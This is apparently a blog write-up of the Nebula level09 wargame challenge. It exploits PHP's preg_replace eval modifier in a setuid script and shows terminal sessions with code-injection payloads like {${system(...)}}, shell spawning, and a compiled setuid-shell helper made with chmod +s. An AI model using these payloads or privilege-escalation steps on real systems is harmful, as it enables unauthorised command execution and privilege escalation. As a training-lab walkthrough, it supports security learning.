Source code:
The vulnerability is clearly the PREG_REPLACE_EVAL pattern modifier in preg_replace.
The purpose of the code seems to be the transformation of email addresses to a non-spambot-friendly format. Let's try to use it:
level09@nebula:~$ cat << EOF > lethal_data > [email dmolotov@mail.ru] > [email [uberskill@mail.ru]] > EOF level09@nebula:~$ ~flag09/flag09 lethal_data null dmolotov AT mail dot ru <uberskill AT mail dot ru>We can exploit the script using PHP's so called complex syntax.
The actual email address is substituted as the argument to the 'spam' function, and then it's evaluated as PHP code. Normally it should be an email address, but we can achieve arbitrary code execution by using complex syntax as follows:
level09@nebula:~$ cat > lethal_data [email {${system($use_me)}}] level09@nebula:~$ ~flag09/flag09 lethal_data getflag You have successfully executed getflag on a target account PHP Notice: Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1Or you could even get a shell with the EUID of flag09:
level09@nebula:~$ ~flag09/flag09 lethal_data sh sh-4.2$ id uid=1010(level09) gid=1010(level09) euid=990(flag09) groups=990(flag09),1010(level09) sh-4.2$ getflag You have successfully executed getflag on a target accountBut why settle for that when we can even have a SUID shell :)
level09@nebula:~$ cat > /tmp/shell.c #include <unistd.h> #include <stdlib.h> int main() { int euid = geteuid(); setresuid(euid, euid, euid); system("sh"); return 0; } level09@nebula:~$ make /tmp/shell cc /tmp/shell.c -o /tmp/shell level09@nebula:~$ ~flag09/flag09 lethal_data 'cp /tmp/shell /tmp/flag09_sh; chmod +s /tmp/flag09_sh' PHP Notice: Undefined variable: in /home/flag09/flag09.php(15) : regexp code on line 1 level09@nebula:~$ /tmp/flag09_sh sh-4.2$ id uid=990(flag09) gid=1010(level09) groups=990(flag09),1010(level09) sh-4.2$ getflag You have successfully executed getflag on a target accountThere are even other ways to exploit the vulnerability. For instance, we don't need to rely on the $use_me variable at all. We could use $filename and execute the input data itself:
level09@nebula:~$ cat > lethal_data sh # [email {${system($filename)}}] level09@nebula:~$ chmod +x lethal_data level09@nebula:~$ ~flag09/flag09 ./lethal_data null sh-4.2$ id uid=1010(level09) gid=1010(level09) euid=990(flag09) groups=990(flag09),1010(level09) sh-4.2$ getflag You have successfully executed getflag on a target accountOr we could use some PHP black magic and hardcode the command without quotes directly:
level09@nebula:~$ cat > lethal_data [email {${system(sh)}}] level09@nebula:~$ ~flag09/flag09 ./lethal_data null PHP Notice: Use of undefined constant sh - assumed 'sh' in /home/flag09/flag09.php(15) : regexp code on line 1 sh-4.2$ id uid=1010(level09) gid=1010(level09) euid=990(flag09) groups=990(flag09),1010(level09) sh-4.2$ getflag You have successfully executed getflag on a target accountWe got the flag by exploiting the same vulnerability with three different methods :)
~ Dmitry
No comments:
Post a Comment